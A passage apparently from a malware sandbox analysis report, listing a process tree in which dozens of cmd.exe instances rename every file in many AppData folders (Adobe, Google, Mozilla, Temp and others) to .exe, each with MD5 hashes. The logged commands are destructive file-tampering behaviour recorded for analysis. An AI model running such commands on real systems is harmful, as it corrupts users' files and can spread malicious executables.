          • cmd.exe (PID: 7644 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6720 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4164 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5700 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5620 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4616 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6308 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7096 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7320 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6092 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3688 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6096 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7472 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3856 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7876 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6464 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3440 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7328 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2940 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6156 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5564 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4508 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1448 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6828 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5336 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6588 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5064 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3172 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6148 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7360 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3144 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1396 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7196 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7904 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\D3DSCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3808 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1080 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3160 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 2128 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8148 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2520 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7136 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6164 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7276 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7240 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4256 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7096 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2824 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6180 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6092 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3688 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7348 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5880 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2200 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6396 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7748 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6764 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3276 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3340 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7524 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6620 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1448 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7016 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4768 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2624 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5268 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3436 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1896 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6720 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
